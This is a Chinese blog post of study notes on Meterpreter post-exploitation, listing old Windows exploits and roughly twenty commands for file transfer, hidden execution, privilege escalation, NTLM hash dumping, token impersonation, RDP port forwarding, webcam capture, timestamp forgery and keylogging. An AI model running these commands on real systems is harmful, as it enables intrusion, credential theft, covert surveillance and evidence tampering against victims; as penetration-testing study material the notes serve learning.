关于 后渗透 - Meterpreter 的使用

已于 2022-09-05 18:29:20 修改
阅读量2.2k 收藏 10
点赞数 1
分类专栏: Kali Linux - 渗透测试 文章标签: 网络安全 web安全 linux
于 2022-09-05 18:19:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61427044/article/details/126699676
版权

关于 后渗透 - Meterpreter 的使用

·关于一些漏洞

历史原因,关于一些低版本的 2013操作系统,还仍存在着 WinXPenSP3 的漏洞

网络服务器攻击渗透:ms08_067 【WinXPenSP3】 ms10_018
应用软件格式渗透:利用 word 去渗透(MS10-087) >search rtf
“永恒之蓝”(比特币勒索病毒) :ms17-010

· meterpreter 的一些后渗透攻击使用方法

1、上传文件到 Windows 主机
——> 简单的说,你可以上传本机的任意文件到远程目标主机中。

meterpreter> upload <file> <destination>

**注意**:使用 -r 参数可以递归上传目录和文件

2、从 Windows 主机下载文件
—— > download 命令可以下载远程主机上的文件

meterpreter> download <file><path to save>

注意:Windows 路径要使用双斜线!!!
如果我们需要递归下载整个目录包括子目录和文件,我们可以使用 download -r 命令

3、在目标主机上执行 exe 文件
—— > 使用 execute 命令在目标主机上执行应用程序

meterpreter> execute -f <path> [options]

4、创建 CMD 新通道
—— > 在目标主机上执行命令提示符

meterpreter> execute -f cmd -c

5、显示进程
—— > ps 命令 会显示目标主机上所有正在运行的进程

meterpreter> ps

6、获取目标主机的 cmd shell
—— > shell命令 可以进入主机的 cmd

meterpreter> shell

7、获取 admin 权限:

meterpreter> getsystem

8、使用 Hashdump 转储所有 hash 值:
—— > 我们可以使用 meterpreter shelldump目标主机的当前系统账户和密码。转储的内容是 NTML 哈希格式,网上有很多工具和技巧来破解它们。
NTLM 在线破解:https://hashkiller.co.uk/ntlm-decrypter.aspx
以下是我整理的关于 Hash 学习的一些网站:
https://gchq.github.io/CyberChef/ https://zh.wikipedia.org/wiki/%E6%95%A3%E5%88%97%E5%87%BD%E6%95%B8

meterpreter> hashdump

// 输出的每一行内容格式如下:
		Username:SID;LM hash:NTML  hash:::

9、使用 Credcollect 转储 hash 值:
—— > 还有一个类似的脚本叫 credentinal_collector,也可以收集目标主机的 tokens

meterpreter> run credcollect

10、创建端口转发:
—— > meterpreter shell 中的 portfwd 命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机。

add 选项会将端口转发添加到列表中,而且本质上会创建一个隧道。
!!!请注意:这个隧道存在于 meterpreter 控制台之外,任何终端会话都可以使用

portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标主机的3389端口转发到本地 6666端口

rdesktop -127.0.0.1
远程桌面连接:127.0.0.1:6666

11、删除端口转发:
—— > 跟创建端口转发命令类似,这条命令是删除一条端口转发的记录

meterpreter> portfwd delete -l<portnumber> -p <portnumber> -r <Target-ip>

显示所有端口转发记录: portfwd list
删除所有的记录: portfwd flush

12、在目标主机上搜索文件:
—— > 定位查找目标主机上特定文件。可以搜索整个文件系统,也可以搜索特定的文件夹。

例如: meterpreter> search -f txt

13、获取用户 ID:
—— > getuid 命令会显示主机上运行 meterpreter 服务的用户

meterpreter> getuid

14、获取系统信息:
—— > sysinfo 命令会显示系统排名,操作系统,架构和语言等。

meterpreter> sysinfo

15、模拟任意用户(token 操作):
—— > 这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助,因为在微软活动目录中,本地访问并没有多大用,但是如果能搞到凭证尤其是管理员凭证,那就非常有用了。
incognito 最开始是一个独立的应用,当你成功入侵系统后可以用它来模拟用户**tokens。**这个应用后来集成到了 metasploit ,并且最终集成到了 meterpreter 中,使用如下:

  • meterpreter 会话 中加载这个模块,只要输入 use incognito 命令即可

  • 输入 list_tokens -u 来显示所有有效的 tokens

  • 然后我们需要模拟某个 token 来获取其权限。还有注意,如果成功模拟了一个 token,我们可以使用 getuid 命令来检查当前用户的 ID

  • user incognito

  • list_tokens -u

  • impersonate_token "Machine\\user"

16、webcam 摄像头命令:

meterpreter> webcam_list #查看摄像头
meterpreter> webcam_snap #通过摄像头拍照
meterpreter> webcam_stream #通过摄像头开启视频

17、execute 执行文件:

meterpreter> execute #在目标机中执行文件
meterpreter> execute -H -i -f cmd.exe # 创建新进程 cmd.exe, -H 不可见,-i 交互

18、timestomp 伪造时间戳:

meterpreter> timestomp C:// -h #查看帮助
meterpreter> timestomp -v C://2.txt #查看时间戳
meterpreter> timestomp C://2.txt -f C://1.txt #将 1.txt的时间戳复制给2.txt

19、enable_rdp 脚本开启 3389:

meterpreter> run post/windows/manage/enable_rdp #开启远程桌面
meterpreter> run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
meterpreter> run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将 3389端口转发到 6662

/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb

通过 enable_rdp.rb 脚本可知:开启 rdp 是通过 reg 修改注册表;添加用户 是调用 cmd.exe 通过 net user 添加;端口转发是利用 portfwd 命令

20、键盘记录:

meterpreter> keyscan_start #开始键盘记录
meterpreter> keyscan_dump #导出记录数据
meterpreter> keyscan_stop #结束键盘记录

其它详细信息可以查看: https://xz.aliyun.com/t/2536

以上是一些笔记整理与学习,欢迎评论交流学习!

辉小鱼~
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试Metasploit框架体验(4. Meterpreter渗透
weixin_51803729的博客
02-11 3091
渗透测试Metasploit框架体验(5. Meterpreter渗透
渗透测试-[Meterpreter渗透25招]
m0_43405474的博客
05-07 3242
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
metersphere 上传和下载接口上传文件参数化及下载文件校验
最新发布
mmy的博客
06-05 502
整体思路:首先编写下载用例(使用浏览器下载的请求url),配置后置操作将下载文件输出到指定文件中,配置脚本断言规则,读取下载文件内容然后进行校验。测试上传类型接口时,有时需要从前置用例中获取文件中的内容参数写入文件中后再进行上传接口调用,也就是说我想要随时改变上传文件的内容。对于一些下载接口需要对下载的文件内容做校验,如何模拟浏览器下载操作获得下载文件及内容呢。通过前置操作获取到上传的文件,然后修改文件内的内容,从而实现动态改变文件内容的目的。其中file_name是需要保存的文件路径,可自定义。
MeterSphere接口测试:测试上传各种文件类型的接口
hxe116的博客
10-22 818
MeterSphere(简写为MS) 是一站式的开源持续测试平台,遵循 GPL v3 开源许可协议,涵盖测试管理、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准,有效助力开发和测试团队充分利用云弹性进行高度可扩展的自动化测试,加速高质量的软件交付。
meterpreter命令使用
wutiangui的博客
04-25 630
getwd命令可以获得目标机上当前的工作目录,相似的命令有getlwd。使用edit命令可以调用vi编辑器,对目标机上的文件进行编辑。ipconfig命令用于获取目标主机上的网络接口信息。download命令从目标机上下载文件或文件夹。route命令用于显示目标主机的路由信息。在目标机上隐藏执行cmd.exe程序。background挂起会话。sysinfo查看系统信息。使用cat命令查看文件内容。sessions连接会话。
生命在于学习——MSF初体验(二)
易水哲的博客
10-21 2226
MSF初体验(二)——Meterpreter命令
79-79.渗透测试-meterpreter介绍.mp4
05-10
79-79.渗透测试-meterpreter介绍.mp4
渗透工具Meterpreter功能介绍及使用教程
12-29
渗透工具Meterpreter功能介绍及使用教程
E026-渗透测试常用工具-使用meterpreter模块进行后渗透测试.pdf
12-02
本课程主要讲解如何使用Meterpreter模块进行后渗透测试。 首先,了解MeterpreterMeterpreter是一种动态的、交互式的远程控制工具,它是Metasploit框架的一部分。它可以在多种操作系统上运行,包括Windows、Linux...
binghe001#BingheGuide#2022-05-02-004-Meterpreter以被控制的计算机为跳板渗透其他服
07-25
title: Meterpreter以被控制的计算机为跳板渗透其他服务器tagline: by 冰河excerpt: Meterpreter以被控制的计算机为跳
meterpreter渗透模块最新实操视频
11-02
这个教程主要侧重于内网渗透metasploit中的meterete视频实操,小编自认为不错,因为免费分享给更多人学习,想学习更多内容下载后按照向导关注我们的自媒体平台即可,谢谢支持!
使用Metersphere测试文件上传接口
cyw16076的博客
03-24 3864
使用Metersphere测试文件上传接口 Metersphere开发团队开发的chrome浏览器上的录制插件非常好用,直接将http请求录制后导入系统自动生成api接口和接口用例。但是在试用过程中录制的文件上传接口,是没法直接试用的,现将文件上传的接口试用经验记录下来。 使用场景 在测试系统中有需要上传文件,使用Metersphere录制的请求导入后是不能使用的。 需要将请求体改为form-data,里面的key、value值可以在上传文件时通过浏览器network查看到 把对应的key和value
meterpreter实用命令---个人实战整理
weixin_44155363的博客
03-25 1218
meterpreter实用命令 1、background命令 返回,把meterpreter后台挂起 2、session命令 session 命令可以查看已经成功获取的会话 可以使用session -i 连接到指定序号的meterpreter会话已继续利用 3、shell命令 获取目标主机的远程命令行shell 如果出错,考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理...
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 843
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
JMeter接口测试之文件上传
weixin_44867191的博客
07-17 1805
Match No.:取第几个数值,0代表随机,-1代表取全部数组数据,1代表取一个变量数值,与设置的变量名称有关,本次示例填-1(说明:如果填写1,后面引用变量的时候直接用${get_picture_url}即可,如果填写-1,返回的是一个数组,后面引用变量的时候要用${get_picture_url_1},${get_picture_url_2}的形式)这个步骤包含两个接口,一个上传图片文件接口,返回一个路径字段值,在新建凭证接口的请求参数中带上路径,即可新建成功。
Metasploit--渗透--上传/下载文件
千寻的博客
02-18 8177
upload file 命令则能够向目标系统上传文件。 download file 命令可以帮助我们从目标系统中下载文件
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3847
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   Meterpreter 是 Metasploit 框架中的一...
渗透Meterpreter常用命令记录
Sp4rkW的博客
12-18 9045
基本命令 命令 解释 background 将meterpreter终端隐藏在后台(快捷键ctrl+z) sessions 查看已经成功获得的会话,如果想继续与某会话交互,可以使用sessions -i 命令. quit 直接关闭当前的meterpreter会话,返回MSF终端. shell 获取目标系统的控制台shell. irb 在meterpret
meterpreter渗透
04-07
Meterpreter是一种强大的后渗透工具,它可以在目标机器上执行各种命令和操作,包括文件系统访问、进程管理、网络扫描、密码破解、漏洞利用等等。在使用Meterpreter进行后渗透时,可以采取以下几个步骤: 1. 获取系统信息:使用sysinfo命令可以获取目标系统的详细信息,包括操作系统版本、硬件配置、用户信息等等,这些信息有助于后续的攻击操作。 2. 收集凭证信息:使用hashdump命令可以获取目标系统上保存的用户密码哈希值,然后可以使用破解工具进行破解,从而获取有效的登录凭证。 3. 扫描网络和主机:使用portscan和subnet命令可以对目标网络进行扫描,发现开放的服务和漏洞,然后可以使用exploit模块进行攻击。 4. 接管会话和持久化:使用migrate命令可以将Meterpreter会话转移到目标系统中的其他进程中,从而提高攻击的稳定性和隐蔽性。同时,还可以使用persist命令将Meterpreter程序持久化到目标系统中,以便于下次连接。 5. 进行攻击操作:利用Meterpreter的各种模块和命令,可以进行各种攻击操作,包括远程执行命令、上传下载文件、横向移动、权限提升、漏洞利用等等。 6. 残留清理:完成攻击后,应该进行残留的清理工作,包括删除日志文件、清除历史记录、删除痕迹等等,以避免被发现和追踪。 总之,Meterpreter是一款非常强大的后渗透工具,可以帮助渗透测试人员和黑客更好地进行攻击和渗透测试工作。但是,在使用Meterpreter进行攻击时,应该遵循道德和法律的原则,避免对他人造成不必要的损害和危害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值